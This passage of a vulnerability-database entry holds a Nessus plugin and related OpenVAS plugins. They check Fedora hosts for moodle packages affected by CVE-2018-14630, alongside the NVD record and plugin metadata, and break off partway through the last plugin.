ID: FEDORA_2018-43FF5F6E5B.NASL | Type: nessus | Reporter: This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof. | Modified: 2018-09-27T00:00:00
Description
Fix for CVE-2018-14630
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora update system website.
Tenable has attempted to automatically clean and format it as much as
possible without introducing additional issues.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Fedora Security Advisory FEDORA-2018-43ff5f6e5b.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Registration branch: when `description` is true the script only records the
# plugin metadata below and then exits (see the exit(0) at the end of this
# block), so none of the host checks further down are reached from here.
if (description)
{
  # Plugin identity and revision tracking.
  script_id(117718);
  script_version("1.6");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");

  # Cross-references used to correlate this finding with the CVE record and
  # the Fedora advisory it was generated from.
  script_cve_id("CVE-2018-14630");
  script_xref(name:"FEDORA", value:"2018-43ff5f6e5b");

  script_name(english:"Fedora 27 : moodle (2018-43ff5f6e5b)");
  script_summary(english:"Checks rpm output for the updated package.");

  script_set_attribute(attribute:"synopsis", value:"The remote Fedora host is missing a security update.");

  # The description is a multi-line string literal; its continuation lines
  # start at column 0 so that no indentation leaks into the reported text.
  script_set_attribute(attribute:"description", value:
"Fix for CVE-2018-14630
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora update system website.
Tenable has attempted to automatically clean and format it as much as
possible without introducing additional issues."
  );
  script_set_attribute(attribute:"see_also", value:"https://bodhi.fedoraproject.org/updates/FEDORA-2018-43ff5f6e5b");
  script_set_attribute(attribute:"solution", value:"Update the affected moodle package.");

  # Risk scoring. Both base vectors describe a network-reachable issue that
  # requires an authenticated account (Au:S in v2, PR:L in v3); the v3 vector
  # rates confidentiality, integrity and availability impact as High.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
  # Temporal vectors: proof-of-concept exploit code (E:POC / E:P), an official
  # fix (RL:OF / RL:O) and a confirmed report (RC:C).
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  # Exploit availability is flagged explicitly, which matters when ranking
  # this finding against other missing updates.
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  # "local" marks this as a check against data collected from the host itself
  # rather than a probe of the Moodle web application.
  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:moodle");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:27");

  script_set_attribute(attribute:"vuln_publication_date", value:"2018/09/17");
  script_set_attribute(attribute:"patch_publication_date", value:"2018/09/26");
  script_set_attribute(attribute:"plugin_publication_date", value:"2018/09/27");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Fedora Local Security Checks");

  # The check depends on knowledge-base entries that are presumably populated
  # by ssh_get_info.nasl during a credentialed scan (confirm against that
  # script). A host scanned without those keys is not evaluated by this
  # plugin, which is different from the host being reported as patched.
  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");

  exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
# Host check. Each guard below calls audit() with the reason the host cannot
# be evaluated; the original flow relies on audit() ending the script.

# Credentialed (local) checks must have been enabled for this host.
if (!get_kb_item("Host/local_checks_enabled"))
{
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
}

# The release string must identify a Fedora system.
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" >!< release)
{
  audit(AUDIT_OS_NOT, "Fedora");
}

# Extract the numeric release and require it to be exactly 27 (the pattern
# rejects values such as 270 by demanding a non-digit or end of string next).
os_ver = pregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(os_ver))
{
  audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
}
os_ver = os_ver[1];
if (! preg(pattern:"^27([^0-9]|$)", string:os_ver))
{
  audit(AUDIT_OS_NOT, "Fedora 27", "Fedora " + os_ver);
}

# Without a collected package list there is nothing to compare against.
if (!get_kb_item("Host/RedHat/rpm-list"))
{
  audit(AUDIT_PACKAGE_LIST_MISSING);
}

# NOTE(review): hosts whose Host/cpu is neither x86_64 nor i386-i686 are
# audited out here as "local checks not implemented", so the package
# comparison below never runs for them, although the rpm_check call passes no
# cpu argument. Confirm whether other architectures are covered elsewhere.
cpu = get_kb_item("Host/cpu");
if (isnull(cpu))
{
  audit(AUDIT_UNKNOWN_ARCH);
}
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$")
{
  audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);
}

# rpm_check() comes from rpm.inc (not shown here); presumably it returns true
# when the installed moodle package is older than the reference build -
# confirm against rpm.inc. Only package data is consulted, so a Moodle copy
# deployed outside the package manager would not be seen by this check.
if (rpm_check(release:"FC27", reference:"moodle-3.3.8-1.fc27"))
{
  # NOTE(review): the finding is raised with SECURITY_WARNING while the
  # plugin's CVSS v3 base vector rates C/I/A impact as High; triage on the
  # CVSS data rather than on this constant alone.
  security_report_v4(
    port     : 0,
    severity : SECURITY_WARNING,
    extra    : rpm_report_get()
  );
  exit(0);
}

# Not flagged: distinguish "package present and not affected" from
# "package not installed" so the audit trail shows what was actually tested.
tested = pkg_tests_get();
if (tested)
{
  audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
}
else
{
  audit(AUDIT_PACKAGE_NOT_INSTALLED, "moodle");
}
{"id": "FEDORA_2018-43FF5F6E5B.NASL", "bulletinFamily": "scanner", "title": "Fedora 27 : moodle (2018-43ff5f6e5b)", "description": "Fix for CVE-2018-14630\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "published": "2018-09-27T00:00:00", "modified": "2018-09-27T00:00:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/117718", "reporter": "This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bodhi.fedoraproject.org/updates/FEDORA-2018-43ff5f6e5b"], "cvelist": ["CVE-2018-14630"], "type": "nessus", "lastseen": "2021-01-07T10:17:10", "edition": 16, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-14630"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310875105", "OPENVAS:1361412562310875102", "OPENVAS:1361412562310112381", "OPENVAS:1361412562310112380"]}, {"type": "fedora", "idList": ["FEDORA:EFB656087D8D", "FEDORA:8A2B4605A2AB", "FEDORA:0B2626057155"]}, {"type": "zdt", "idList": ["1337DAY-ID-31126"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:149426"]}, {"type": "nessus", "idList": ["FEDORA_2018-690535D30B.NASL", "FREEBSD_PKG_074CB225BB2D11E890E1FCAA147E860E.NASL", "FEDORA_2018-84A5340CC9.NASL"]}, {"type": "freebsd", "idList": ["074CB225-BB2D-11E8-90E1-FCAA147E860E"]}], "modified": "2021-01-07T10:17:10", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2021-01-07T10:17:10", "rev": 2}, "vulnersScore": 6.3}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 
FEDORA-2018-43ff5f6e5b.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117718);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-14630\");\n script_xref(name:\"FEDORA\", value:\"2018-43ff5f6e5b\");\n\n script_name(english:\"Fedora 27 : moodle (2018-43ff5f6e5b)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2018-14630\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-43ff5f6e5b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected moodle package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:moodle\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/17\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"moodle-3.3.8-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"moodle\");\n}\n", "naslFamily": "Fedora Local Security Checks", "pluginID": "117718", "cpe": ["cpe:/o:fedoraproject:fedora:27", "p-cpe:/a:fedoraproject:fedora:moodle"], "scheme": null, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}}
{"cve": [{"lastseen": "2021-02-02T06:52:29", "description": "moodle before versions 3.5.2, 3.4.5, 3.3.8, 3.1.14 is vulnerable to an XML import of ddwtos could lead to intentional remote code execution. When importing legacy 'drag and drop into text' (ddwtos) type quiz questions, it was possible to inject and execute PHP code from within the imported questions, either intentionally or by importing questions from an untrusted source.", "edition": 8, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-09-17T18:29:00", "title": "CVE-2018-14630", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14630"], "modified": "2019-10-09T23:35:00", "cpe": ["cpe:/a:moodle:moodle:3.0.10"], "id": "CVE-2018-14630", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-14630", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:moodle:moodle:3.0.10:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:33:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14630"], "description": "The remote host is missing an update for the ", 
"modified": "2019-03-15T00:00:00", "published": "2018-09-27T00:00:00", "id": "OPENVAS:1361412562310875102", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875102", "type": "openvas", "title": "Fedora Update for moodle FEDORA-2018-690535d30b", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_690535d30b_moodle_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for moodle FEDORA-2018-690535d30b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875102\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-09-27 08:47:31 +0200 (Thu, 27 Sep 2018)\");\n script_cve_id(\"CVE-2018-14630\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for moodle FEDORA-2018-690535d30b\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'moodle'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n script_tag(name:\"affected\", value:\"moodle on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-690535d30b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FAVD2O5OK7OJS5MK4OBP2ZHVMC4DPRY6\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"moodle\", rpm:\"moodle~3.4.5~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14630"], "description": "Moodle CMS is prone to a remote code execution vulnerability.", "modified": "2018-12-07T00:00:00", "published": "2018-09-18T00:00:00", "id": "OPENVAS:1361412562310112380", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112380", "type": "openvas", "title": "Moodle CMS 3.5.x < 3.5.2, 3.4.x < 3.4.5, 3.2.x < 3.3.8 and < 3.1.14 RCE Vulnerability (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_moodle_msa-18-0017_lin.nasl 12697 2018-12-07 07:56:28Z mmartin $\n#\n# Moodle CMS 3.5.x < 3.5.2, 3.4.x < 3.4.5, 3.2.x < 3.3.8 and < 3.1.14 RCE Vulnerability (Linux)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112380\");\n script_version(\"$Revision: 12697 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-07 08:56:28 +0100 (Fri, 07 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-09-18 11:17:22 +0200 (Tue, 18 Sep 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2018-14630\");\n\n script_name(\"Moodle CMS 3.5.x < 3.5.2, 3.4.x < 3.4.5, 3.2.x < 3.3.8 and < 3.1.14 RCE Vulnerability (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_moodle_cms_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"moodle/detected\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"Moodle CMS is prone to a remote code execution vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"When importing legacy 'drag and drop into text' (ddwtos) type quiz questions,\n it was possible to inject and execute PHP code from within the imported questions, either intentionally or by importing questions from an untrusted source.\");\n script_tag(name:\"affected\", value:\"Moodle CMS 3.5 to 3.5.1, 3.4 to 3.4.4, 3.2 to 3.3.7, 3.1 to 3.1.13 and earlier 
unsupported versions.\");\n script_tag(name:\"solution\", value:\"Update to version 3.1.14, 3.3.8, 3.4.5 or 3.5.2 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-14630\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=376023\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:moodle:moodle\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( port: port, cpe:CPE, exit_no_version:TRUE ) ) exit( 0 );\nversion = infos['version'];\npath = infos['location'];\n\nif( version_is_less( version: version, test_version: \"3.1.14\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.1.14\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.2.0\", test_version2: \"3.3.7\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.3.8\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.4.0\", test_version2: \"3.4.4\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.4.5\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.5.0\", test_version2: \"3.5.1\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.5.2\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14630"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": 
"2018-09-28T00:00:00", "id": "OPENVAS:1361412562310875105", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875105", "type": "openvas", "title": "Fedora Update for moodle FEDORA-2018-43ff5f6e5b", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_43ff5f6e5b_moodle_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for moodle FEDORA-2018-43ff5f6e5b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875105\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-09-28 13:34:06 +0200 (Fri, 28 Sep 2018)\");\n script_cve_id(\"CVE-2018-14630\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for moodle FEDORA-2018-43ff5f6e5b\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'moodle'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n script_tag(name:\"affected\", value:\"moodle on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-43ff5f6e5b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T4LYH3KARSFJQ4MB3ZPWDY7BAI7W6A5B\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"moodle\", rpm:\"moodle~3.3.8~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14630"], "description": "Moodle CMS is prone to a remote code execution vulnerability.", "modified": "2018-12-07T00:00:00", "published": "2018-09-18T00:00:00", "id": "OPENVAS:1361412562310112381", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112381", "type": "openvas", "title": "Moodle CMS 3.5.x < 3.5.2, 3.4.x < 3.4.5, 3.2.x < 3.3.8 and < 3.1.14 RCE Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_moodle_msa-18-0017_win.nasl 12697 2018-12-07 07:56:28Z mmartin $\n#\n# Moodle CMS 3.5.x < 3.5.2, 3.4.x < 3.4.5, 3.2.x < 3.3.8 and < 3.1.14 RCE Vulnerability (Windows)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112381\");\n script_version(\"$Revision: 12697 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-07 08:56:28 +0100 (Fri, 07 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-09-18 11:17:22 +0200 (Tue, 18 Sep 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2018-14630\");\n\n script_name(\"Moodle CMS 3.5.x < 3.5.2, 3.4.x < 3.4.5, 3.2.x < 3.3.8 and < 3.1.14 RCE Vulnerability (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_moodle_cms_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"moodle/detected\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"Moodle CMS is prone to a remote code execution vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"When importing legacy 'drag and drop into text' (ddwtos) type quiz questions,\n it was possible to inject and execute PHP code from within the imported questions, either intentionally or by importing questions from an untrusted source.\");\n script_tag(name:\"affected\", value:\"Moodle CMS 3.5 to 3.5.1, 3.4 to 3.4.4, 3.2 to 3.3.7, 3.1 to 3.1.13 and earlier unsupported 
